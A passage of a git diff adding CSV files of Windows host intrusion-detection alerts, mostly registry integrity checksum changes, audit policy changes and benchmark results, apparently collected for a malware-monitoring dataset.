generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:04:20.660",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T12:49:04Z. Reason: RulesEngine.""" diff --git a/data/MW_14_HIDS_3.csv b/data/MW_14_HIDS_3.csv new file mode 100644 index 0000000..1ba08bc --- /dev/null +++ b/data/MW_14_HIDS_3.csv @@ -0,0 +1,89 @@ +timestamp,"rule.level","rule.description","data.win.system.message","full_log","data.win.eventdata.commandLine" +"May 22, 2020 @ 16:48:50.993",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '1c729912f87f9abbd1574176fc5996f7' +New md5sum is : '370914f65a755a1cbfcf0c873b11feaa' +Old sha1sum was: '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +New sha1sum is : 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +", +"May 22, 2020 @ 16:46:25.178",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : '7a6925496501f6eab705d5c7ab038696' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : '8bdc84c00ad75f8b65e6fa6eb585f0d689061628' +", +"May 22, 2020 @ 16:46:25.148",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : '15a74f51d7a0d4e1ac30c4b6d7d50bc1' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : '896016bfa429eaf3f1b7ca668d65033c1814feee' +", +"May 22, 2020 @ 16:45:47.974",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +", +"May 22, 2020 @ 16:45:40.177",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Capabilities' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : 'b80f2e9655feff9c2a5629f979488e11' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'b0d2d800da5377e859b10323361ef497b61aa1e0' +", +"May 22, 2020 @ 16:44:56.391",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,, +"May 22, 2020 @ 16:44:46.583",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",, +"May 22, 2020 @ 16:44:11.285",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 22, 2020 @ 16:44:11.270",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Capabilities' checksum changed. +Old md5sum was: 'b80f2e9655feff9c2a5629f979488e11' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'b0d2d800da5377e859b10323361ef497b61aa1e0' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 22, 2020 @ 16:41:19.765",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +", +"May 22, 2020 @ 16:40:01.818",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 22, 2020 @ 16:40:01.771",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 22, 2020 @ 16:39:52.210",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'a18eb7d2d71c498e6c68f4d4ae0641c7' +New md5sum is : '496e80acc19637c8daf8c286b6ea10f0' +Old sha1sum was: '4458c74e5e5b43abcaa686c52ebb00d5149c3406' +New sha1sum is : '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +", +"May 22, 2020 @ 16:39:52.194",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '2dff0dec78c8ef123f08b1e2d23e5734' +New md5sum is : '89598d32459256342f73e9b832b618dc' +Old sha1sum was: 'd900f31683f204db3e8408c6a0391eed28337ae9' +New sha1sum is : '68aacf23a86d664018607a7fc5d1379269af8643' +", diff --git a/data/MW_14_NIDS.csv b/data/MW_14_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_14_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_15_HIDS_1.csv b/data/MW_15_HIDS_1.csv new file mode 100644 index 0000000..cdf65f5 --- /dev/null +++ b/data/MW_15_HIDS_1.csv @@ -0,0 +1,369 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 4, 2020 @ 16:41:48.310",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed", +"Apr 4, 2020 @ 16:35:11.398",8,"Windows Audit Policy changed", +"Apr 4, 2020 @ 16:35:11.414",8,"Windows Audit Policy changed", +"Apr 4, 2020 @ 16:35:03.940",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '66412b599c9052ba1a1c9e08b7abbe7c' +New md5sum is : 'a0df8d6e879d924da3288b2aa0b85114' +Old sha1sum was: '9268e8b2e326583f233d96d8b6fe32e48969274e' +New sha1sum is : '5b3369bb152c26552a26be399f0ea043686a36fe' +" +"Apr 4, 2020 @ 16:35:03.941",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '78e6332dc13f45b431b234040dc6c45a' +New md5sum is : '93c2f688a68bea92ca0316b543b731f9' +Old sha1sum was: 'c71a1f75575f97e8ce9571f3ba2fd1e8c4b53f28' +New sha1sum is : '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +" +"Apr 4, 2020 @ 16:37:36.180",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c07851f8f2e30eb65757347b948170ba' +New md5sum is : 'f82e4dca8fa64fec2f300e13070576d2' +Old sha1sum was: '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60' +New sha1sum is : '6cb808077186c7f926dd8620d24565a1c25f2bed' +" +"Apr 4, 2020 @ 16:38:21.302",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '0a11a072fc5a95522aa8ca6087115073' +New md5sum is : '728627011eedd28411cf4e1f2a30d1ca' +Old sha1sum was: '7afc9a8039fc019833a674d4b24d2aac0c3bec0f' +New sha1sum is : '26576187b3bbee39309e7ebe95de85749ea7b9d2' +" +"Apr 4, 2020 @ 16:38:21.349",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '561278354652120b9564b6a611e33cac' +New md5sum is : '8705f3ab5cf990d6c1ef6bc5b2096f58' +Old sha1sum was: 'ba6bcd0d6357a824c6429cdda85f72e1a281f021' +New sha1sum is : '7d0d0c4a70679750982381e5e9cbe9653ac96737' +" +"Apr 4, 2020 @ 16:38:22.396",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '4f0b888d9ae2fb8def9aa6fc72cca859' +New md5sum is : '34c422579604f111c84b176ad275c071' +Old sha1sum was: '5f4b058d671d22b61f253bbdb36509e37217ce71' +New sha1sum is : '6e28feeda1028114fd693466085935d9e610cfb9' +" +"Apr 4, 2020 @ 16:38:34.100",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '619d435b1dac461a9b0cfd3b48ee8f37' +New md5sum is : '3bed6b4b8101da842bb6afe04a8271c2' +Old sha1sum was: '95d0826303f42e23fada9a211bd9ea71de2d5c51' +New sha1sum is : '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +" +"Apr 4, 2020 @ 16:38:34.130",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'f65ebed619edcfc8fafe21f958215b53' +New md5sum is : '98f645d827b038bfbb3a44a8c17a66ff' +Old sha1sum was: '493297f96d762981a98fbe5f8c5b5782c30b65aa' +New sha1sum is : '2d81f3892a302534ce0115f4db0ffd4ae3651431' +" +"Apr 4, 2020 @ 16:40:27.202",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"Apr 4, 2020 @ 16:40:27.217",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"Apr 4, 2020 @ 16:41:41.622",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 4, 2020 @ 16:42:31.556",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +" +"Apr 4, 2020 @ 16:42:42.165",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +" +"Apr 4, 2020 @ 16:43:18.229",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'dca242a1798caa2a9ae6de537858dfe3' +New md5sum is : 'd837cb5171b76e59138e023111554c6b' +Old sha1sum was: 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +New sha1sum is : 'd43cd851ad83928abaf09042dc3d1bc05fccc844' +" +"Apr 4, 2020 @ 16:43:18.290",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'f82e4dca8fa64fec2f300e13070576d2' +New md5sum is : '2e3466c555e0a3bbbed2d233bddc4ce3' +Old sha1sum was: '6cb808077186c7f926dd8620d24565a1c25f2bed' +New sha1sum is : 'e2b0a3298a8bec9be4ded772855a7a1c8b7c3eff' +" +"Apr 4, 2020 @ 16:43:18.306",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '9f6b145dfd560fe21c8d05748910373f' +New md5sum is : '1eebefebc6b548d658597160f05ab29a' +Old sha1sum was: '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +New sha1sum is : '1e7aee2c242d9485759621c66805b838ddb88f6b' +" +"Apr 4, 2020 @ 16:43:23.665",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'ba12a00cc49fb36d8162dcbe904ef1a8' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '818f9eca9844c709fbfd5213563e7963319d5968' +" +"Apr 4, 2020 @ 16:43:26.415",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '903b8f5bbc25f56d3fac80d5240a6156' +New md5sum is : '4e73781ca94f96529b305e483ab177a3' +Old sha1sum was: '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +New sha1sum is : 'ffdfde7db93ec9a9eeda8bf729e49dc5503d7f1b' +" +"Apr 4, 2020 @ 16:43:35.789",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'a397028e02aba031e9a6ca6ee2322c66' +New md5sum is : 'a50565eb5ea31fac522e0235eae98a5f' +Old sha1sum was: 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +New sha1sum is : '227fdbbd4919b9750af3564422e695d446104f93' +" +"Apr 4, 2020 @ 16:43:43.994",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 4, 2020 @ 16:43:44.947",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '62c6556f67affdb39777191a82841f1a' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : 'a5837346c9a0ee689d6c15d990ac8c21c9b3a7df' +" +"Apr 4, 2020 @ 16:43:45.634",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3879a39655c450780e274d024098bdb5' +New md5sum is : '9d56a0bc769d18ce9a67ee2c49d46de4' +Old sha1sum was: '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +New sha1sum is : '6ea3ce8f9b9fd2500d50eb2575c74cb9d1ce7bed' +" +"Apr 4, 2020 @ 16:43:48.244",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '62c6556f67affdb39777191a82841f1a' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : 'a5837346c9a0ee689d6c15d990ac8c21c9b3a7df' +" +"Apr 4, 2020 @ 16:43:49.603",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'bad2d92e8c5f76681c68068d36d9f8de' +New md5sum is : '6beea6cc73556c0a7100373a9a84405c' +Old sha1sum was: 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +New sha1sum is : '18c9b7e997e1b326d9b89cffacc38033497283b5' +" +"Apr 4, 2020 @ 16:43:55.978",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'a22f4624fc957eb22f371c4f482524df' +New md5sum is : 'a83bfa32b3017669d77eb2a8184aab38' +Old sha1sum was: '432b869a738326466b200cc25be6d8307cfdc040' +New sha1sum is : 'a37d254f321f43e39850a1673d621dc9dc24c1cd' +" +"Apr 4, 2020 @ 16:43:56.947",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +New md5sum is : 'fcf1d20da1fca5699efa750b5b7d5afc' +Old sha1sum was: 'f01eba6dbe74107285007351b77304e1a19bc18e' +New sha1sum is : '1b82de12f22bfd2c6e753c01488ae745f1765ebb' +" +"Apr 4, 2020 @ 16:43:58.478",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '62c6556f67affdb39777191a82841f1a' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : 'a5837346c9a0ee689d6c15d990ac8c21c9b3a7df' +" +"Apr 4, 2020 @ 16:44:05.619",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +" +"Apr 4, 2020 @ 16:44:10.073",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '728627011eedd28411cf4e1f2a30d1ca' +New md5sum is : 'e7da235d7443b87ea4d5d1ef32857357' +Old sha1sum was: '26576187b3bbee39309e7ebe95de85749ea7b9d2' +New sha1sum is : 'c355c6c799dda0b3767d88f9d370687b8dcadb06' +" +"Apr 4, 2020 @ 16:44:10.103",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +" +"Apr 4, 2020 @ 16:44:12.166",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +" +"Apr 4, 2020 @ 16:44:16.837",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'bb30a4865d0fe96a2d7b53b843e8fa0a' +New md5sum is : '0fd732e438748e2bf5d1fb96900c3e25' +Old sha1sum was: '98ca91600e4060c62dc2cc91468e632c4fdc3ef6' +New sha1sum is : '573f5029f5c8c8c783af29fc49c7c868a675c269' +" +"Apr 4, 2020 @ 16:44:18.838",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'ba12a00cc49fb36d8162dcbe904ef1a8' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '818f9eca9844c709fbfd5213563e7963319d5968' +" +"Apr 4, 2020 @ 16:44:19.979",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '342765c52f3fd7b50e5188adb30a0ede' +New md5sum is : '1b61874c0f3937cf641410502c4e4f04' +Old sha1sum was: '6d803f7cc7de0ae861402e45b8a1442595a4b544' +New sha1sum is : 'cd4e6b8fcd0dc7a9aa34cd764065cce66325b311' +" +"Apr 4, 2020 @ 16:44:20.213",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'f6949813e6b9d992278b95b7f209e047' +New md5sum is : '895880f38027cdbcc233f3029d012090' +Old sha1sum was: '8db1fc943f83c30b4bc07f1ed394492c392e7722' +New sha1sum is : '2e368782ef2537fa0912cd004316b58bf94aa7df' +" +"Apr 4, 2020 @ 16:44:20.806",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: 'b132e65b4963a54ebee91bcab8914621' +New md5sum is : '7245f178c1230e0203988365bc0f6f80' +Old sha1sum was: '744e1fde2f3ae486cbff69a205e315e1c2f088e3' +New sha1sum is : '780976d4ad4dff40da2ba205e08ea3fb412ea31c' +" +"Apr 4, 2020 @ 16:44:21.088",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'ba12a00cc49fb36d8162dcbe904ef1a8' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '818f9eca9844c709fbfd5213563e7963319d5968' +" +"Apr 4, 2020 @ 16:44:22.525",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'a6934418b12b085c34f2dbaa9e9fa7a0' +New md5sum is : '4de77cf22ac2123ca809e113b4599aab' +Old sha1sum was: 'd9336cc746599b17846d9aa0e03da9cf70d1f3b7' +New sha1sum is : 'ecad3c82974df73b63be77b70320e046f3aee054' +" +"Apr 4, 2020 @ 16:44:23.198",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '3bed6b4b8101da842bb6afe04a8271c2' +New md5sum is : '937eeb04f75827259e28a380e8e57d87' +Old sha1sum was: '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +New sha1sum is : '012f68fd04a64e99360a4fb6254c06846699e28b' +" +"Apr 4, 2020 @ 16:44:23.228",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '98f645d827b038bfbb3a44a8c17a66ff' +New md5sum is : 'e64836a5cef7b9f14a78cf213c877a27' +Old sha1sum was: '2d81f3892a302534ce0115f4db0ffd4ae3651431' +New sha1sum is : '4a2e9bc4ec6b977acc424612a71e8f374e304740' +" +"Apr 4, 2020 @ 16:44:23.259",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : '729d0877659e4797d3983fddb4576047' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '109945df285ffff37e08eaab1d91e55cb59c26c8' +" +"Apr 4, 2020 @ 16:44:33.792",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a0df8d6e879d924da3288b2aa0b85114' +New md5sum is : '78c61eb826dd2b5505c3fbb50e2092ce' +Old sha1sum was: '5b3369bb152c26552a26be399f0ea043686a36fe' +New sha1sum is : 'f660dc8a035e535ac6be80668730ea227b7331fd' +" +"Apr 4, 2020 @ 16:44:33.807",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '93c2f688a68bea92ca0316b543b731f9' +New md5sum is : 'dad18a7bc1523711e11366d62925e95a' +Old sha1sum was: '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +New sha1sum is : 'b47613f0586ef95cd590e9399ade1478e383e9f1' +" +"Apr 4, 2020 @ 16:40:18.726",5,"Windows System error event", +"Apr 4, 2020 @ 16:40:24.132",5,"WSearch was unavailable to handle a notification event", +"Apr 4, 2020 @ 16:40:24.179",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 16:41:43.161",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 16:41:54.884",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)", +"Apr 4, 2020 @ 16:41:55.122",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 16:41:55.352",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 16:43:15.868",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:15.900",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:18.650",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:18.666",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:19.462",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:19.478",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a7e6\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 16:43:19.510",5,"File added to the system.","File 